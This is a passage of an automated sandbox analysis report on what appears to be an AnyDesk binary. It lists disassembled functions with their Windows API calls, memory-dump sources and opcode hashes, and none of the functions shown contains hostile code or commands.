                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Time$System$File$LocalSpecificUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1393065386-0
                                                                                                                                                                                                                                                  • Opcode ID: 516e1b022e57b2c444f98cd44ecc32a75937b2f48d9673c4e3dd4ea6dd8d9dcc
                                                                                                                                                                                                                                                  • Instruction ID: 7dd155237277ef37ea3d9bccccf77ee5c64bdc10337797513625e491baf62fd0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 516e1b022e57b2c444f98cd44ecc32a75937b2f48d9673c4e3dd4ea6dd8d9dcc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6314A751183659BC710CF65D400B7BB7E8BF88B14F10880EF899C7290E739D94ADBA6
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C4D7C8 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 86530d78637159e232dc846ea9475dbf459d6c7b00d223846420aa2c824e9fc9
                                                                                                                                                                                                                                                  • Instruction ID: a35c9ddf0d12fa442cc79dbb90cee842365eb2d54a8cc09a5ba5c24e4e6f55c8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86530d78637159e232dc846ea9475dbf459d6c7b00d223846420aa2c824e9fc9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A018BB27096167FFB0029797CC0F6B226CEB92BB8B205736B520611D4FB61AC5181A2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C413D5 Relevance: 6.1, APIs: 4, Instructions: 53timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000), ref: 69C41409
                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 69C41418
                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 69C41421
                                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 69C4142E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                                  • Opcode ID: b8e42e237f0e12a529c3931c806558521ad95c1069547b0fd9bb83b603859704
                                                                                                                                                                                                                                                  • Instruction ID: d68a8e4210aeb487b3d634b3b8b01ee2318b8fe7afb09a36b938e2633aa62926
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8e42e237f0e12a529c3931c806558521ad95c1069547b0fd9bb83b603859704
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E119171E04118DFDF04CFB9D5446AE7BB4FF5A311F91146AE806DB240EA308601CBA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C4EEBB Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,69C4EE62,00000000,00000000,00000000,00000000,?,69C4F12C,00000006,FlsSetValue), ref: 69C4EEED
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,69C4EE62,00000000,00000000,00000000,00000000,?,69C4F12C,00000006,FlsSetValue,69C6F920,69C6F928,00000000,00000364,?,69C4FCEC), ref: 69C4EEF9
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,69C4EE62,00000000,00000000,00000000,00000000,?,69C4F12C,00000006,FlsSetValue,69C6F920,69C6F928,00000000), ref: 69C4EF07
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                                                                  • Opcode ID: 0e625e549d788d01442d2766c64329cec93672f0eb477e4bccd957db0acd0efa
                                                                                                                                                                                                                                                  • Instruction ID: 0565e291f14800a19ff0a0ae064648a49f8c0c5897ca7f0ce311f66fdb23cf37
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e625e549d788d01442d2766c64329cec93672f0eb477e4bccd957db0acd0efa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF018437755236ABDB118E6AAC44A76777CAF46FB17120620F915E7180E721D802C6E0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C66D68 Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000028,00000000,0000001C,0000001C,00000000,0000001C,00000000,00000000,?,?,69C660D0,0000001C,00000000,00000028), ref: 69C66D8A
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,69C660D0,0000001C,00000000,00000028), ref: 69C66D94
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,69C660D0,0000001C,00000000,00000028), ref: 69C66D9F
                                                                                                                                                                                                                                                  • GetFileType.KERNEL32(00000028,?,?,69C660D0,0000001C,00000000,00000028), ref: 69C66DBB
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFileLast$ReadType
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2855922492-0
                                                                                                                                                                                                                                                  • Opcode ID: 8a3e4e5decb946abb250f16b05f9e0ee62b0508e04a9f2c4280f492de7fc0e01
                                                                                                                                                                                                                                                  • Instruction ID: 52143c8a1042a75504a1bdb2cf61355e02d83097dceab1f08dbcace23720f762
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a3e4e5decb946abb250f16b05f9e0ee62b0508e04a9f2c4280f492de7fc0e01
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A018B31604569ABEB009E6ADEC5BAA37BDFF42365F000624FD14D7160E734EC118791
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C2D3D0 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 19b66c6cea623c4ce6e82e1a1a5c1cb39f330c3bcc8957baa14ce12d8e58302c
                                                                                                                                                                                                                                                  • Instruction ID: 51e46a715bef9aa086c2c147c4bcc6886b9af60cf2f36e486e41bff98c167f8b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19b66c6cea623c4ce6e82e1a1a5c1cb39f330c3bcc8957baa14ce12d8e58302c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ACF0977EB0420402E304CBB4B711A1F32A88E347A8B20833BE417C2184FB64F59186A7
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C325C0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: e9497407c361fa0e5cdba83c1c808aa0bd6f632a9449a5baa6c9db17d36afeda
                                                                                                                                                                                                                                                  • Instruction ID: 5bad4d476eeeafef2da6d35e21357279413431950453ff6a640d3b4592814c2b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9497407c361fa0e5cdba83c1c808aa0bd6f632a9449a5baa6c9db17d36afeda
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7F09E79B0461003DF04DBB07731A1E32744E20768B80C33AE416C2581F720F653C2D7
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C30640 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: fae71b4869ae569bafac289f6a09a1d21ff0609c13e63d45931af16e1a68b08f
                                                                                                                                                                                                                                                  • Instruction ID: 27aa2fdb8aa64555abfa908e22baaf093d5c4d2f5ed1c2db6a4b746ace57c336
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fae71b4869ae569bafac289f6a09a1d21ff0609c13e63d45931af16e1a68b08f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7F09EBB70061042A304C7747751A1E32B84E90798B90C239EC1AC6548F720E690869B
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C30D70 Relevance: 6.0, APIs: 4, Instructions: 45COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: a3b9674a052d906bc40769fbd11e90ff7402c1ad619f96228d6ceedf274cac0c
                                                                                                                                                                                                                                                  • Instruction ID: f88e39b29eee46e567637b7731f63cfaaff03eeb5ac5794307dfa4fc15d2b904
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3b9674a052d906bc40769fbd11e90ff7402c1ad619f96228d6ceedf274cac0c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DF02E7F70521447F704DBB8B651F5E33E85E60B587808239E406C6519FB25F594C39B
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C2B020 Relevance: 6.0, APIs: 4, Instructions: 45COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 15c0b58c902f026745a66fbe5b3f6f91989226b873c08466af165a5806f21b42
                                                                                                                                                                                                                                                  • Instruction ID: 43eed0dddb5a697a13e7b28291eeb8ba0f895e0ed7f9ac68eb767c005285ac95
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15c0b58c902f026745a66fbe5b3f6f91989226b873c08466af165a5806f21b42
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11F09EF97001088BE315C7B6B711E2E73E88E617547808239E435C7115FB64EA54C3D7
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C6674E Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,00000000), ref: 69C66761
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 69C6677A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 69C66787
                                                                                                                                                                                                                                                  • CloseHandle, xrefs: 69C6679A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                  • String ID: CloseHandle$c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc
                                                                                                                                                                                                                                                  • API String ID: 918212764-2138661059
                                                                                                                                                                                                                                                  • Opcode ID: d05501094d766d11ff6da7917b99f296fa554c4741bd526440a9f6ad88cd29c0
                                                                                                                                                                                                                                                  • Instruction ID: eafebd0f513b8af60aea1ca5d909aa119cda6dd349e151a19bbab96e59d20298
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d05501094d766d11ff6da7917b99f296fa554c4741bd526440a9f6ad88cd29c0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91F0507680071566DB24EE74FDB6F9E7718AF00374F809459ED446E1C2FB319C444191
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C4DD5F Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C4DDC4: _free.LIBCMT ref: 69C4DDF9
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4DD7A
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: HeapFree.KERNEL32(00000000,00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000), ref: 69C4CBBB
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: GetLastError.KERNEL32(00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000,00000000), ref: 69C4CBCD
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4DD8D
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4DD9E
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4DDAF
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: 180bb1800aa9a7ed60819d92d012c6c09726135d8fb9aa68eb3b5b4c96ef0eec
                                                                                                                                                                                                                                                  • Instruction ID: 9cfd4f486788f857b3b187adbac2ae319b7cb3c64ca2e12af10321446b00b53c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 180bb1800aa9a7ed60819d92d012c6c09726135d8fb9aa68eb3b5b4c96ef0eec
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41F0127B511574EAEF019F54EC08CE93A79E766908700D946EC005B270EB3616168A97
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C24B40 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 204COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C24BF6
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C24C00
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-2556327735
